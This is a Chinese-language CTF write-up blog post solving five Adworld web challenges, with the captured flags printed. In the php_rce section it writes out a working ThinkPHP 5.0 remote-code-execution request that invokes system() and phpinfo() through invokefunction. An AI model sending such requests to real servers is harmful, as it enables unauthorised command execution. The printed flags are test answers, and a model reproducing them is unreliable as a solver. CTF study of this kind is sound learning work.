CTF:攻防世界web PART01
写在前面:
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除)
攻防世界web PART01
- baby_web
- Training-WWW-Robots
- php_rce
- Web_php_include
- ics-06
baby_web
- 初始页面
- 第一反应是index.php
- 输入发现不对
- 那就用御剑扫一扫
- 扫不到任何有用的东西
- 那就F12一下
- 可以看到发过来的包里是有index.php的
- flag{very_baby_web}
- get it
Training-WWW-Robots
- robots
- 想到了robots协议
- 话不多说访问一下呗
- 出现了一个路径
- 访问一下
- cyberpeace{0b68a74e7506d5f6349a437023b041be}
- get it
php_rce
- 不知道rce是啥百度了一下
- 大概是漏洞
- 给了php的版本
- ThinkPHP V5
- 去找找看有无什么漏洞
- 去网上找了一个5.0的漏洞利用语句
- 返回结果给了具体的版本号
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
- ls查看目录
- 没什么有用的信息就继续往上查
- 找到flag
- 但是貌似直接查找flag也行
- flag{thinkphp5_rce}
- get it
Web_php_include
- 传参数查看目录
- 使用linux命令访问
- 查看网页源码找到flag
- get it
ics-06
- 发现只有报表中心可以点开
- 看到url有个id
- 爆破试试
- 就它突出
- cyberpeace{e4130164b5b97ade9aaeff8c28c16060}
- get it
end
下机
吃饭
CTF:攻防世界web PART01相关推荐
- 攻防世界web高手进阶php_rce,[CTF]攻防世界web高手进阶区Writeup(更行ing)
baby_web EMMMM,这就是一个签到题~ 解题方法: F12→Networks→刷新抓包→完成 Training-WWW-Robots 看题目可以知道这道题考的是爬虫协议(robots.txt ...
- 《CTF攻防世界web题》之我什么都不会(1)
前言
- 攻防世界 web高手进阶区 9分题 favorite_number
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...
- 攻防世界 web高手进阶区 10分题 weiphp
前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...
- 攻防世界Web题 - unseping 总结
攻防世界Web题 - unseping 总结 1.审题 进入题目,可以看出来是典型的php反序列化题目. 2.源代码分析 <?php highlight_file(__FILE__); //显示 ...
- 攻防世界 web高手进阶区 8分题 Web_python_block_chain
前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...
- 攻防世界 web高手进阶区 9分题 bilibili
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是bilibili的writeup 解题过程 进来界面 这尼玛出题人是黑还是粉啊 笑死 看题目意思是买lv6 惯例源码+御剑 没发现什 ...
- 攻防世界 web高手进阶区 7分题Confusion1
前言 继续ctf的旅程 开始攻防世界web高手进阶区的7分题 本文是Confusion1的writeup 解题过程 进来的界面如下 (后来知道是php vs python的意思,也就是给提示跟pyth ...
- 攻防世界-web高手进阶区
文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...
最新文章
- Cacti Weathermap 高级用法 (二)
- 【React踩坑记一】React项目中禁用浏览器双击选中文字的功能
- key to ribbon chart in powerbi: time, category, value
- android 获取图片主色调
- LeetCode 1055. 形成字符串的最短路径(贪心)
- PyTorch入门-语言模型
- [Leetcode]141. Linked List Cycle
- 云图说|读请求太多怎么办?一键读写分离来帮忙
- 79-Spark Standalone架构设计要点分析
- 腾讯PHP工程师面试题两份
- 【深度学习】全连接层or卷积层
- Json对象直接存取数据库
- 淘宝生成器在线制作,淘宝全屏代码装修店招导航教程
- 音频效果器的介绍与实践
- Scrapy框架-阳光政务平台爬虫(二)
- 计算机上的字体太小怎么办,电脑字体太小怎么调 电脑字体调整方法有哪些
- WordPress自媒体网站迁移
- springboot利用官方SDK(wechatpay-apache-httpclient)接入微信支付V3
- OpenGL-坐标系统,进入3D世界(深度测试)
- win7\win10加域的电脑不输入密码直接登录登录电脑桌面
热门文章
- 2018网易在线笔试题
- Java中判断当前数据是否全为数字
- 【Qt串口调试助手】1.3 - 重写ComboBox下拉框的鼠标点击事件,实现点击下拉框扫描可用串口
- MQTT.fx客户端MQTT接入阿里云物联网平台,登录、订阅、发布消息
- c/c++教程 - 1.5 运算符
- 剑指offer——22.链表中倒数第k个节点
- 梯度提升树(GBDT)原理小结(转载)
- Ubuntu 实现点击菜单栏图标最小化程序
- Hibernate的Cascade——级联操作
- poj 1279 Art Gallery - 求多边形核的面积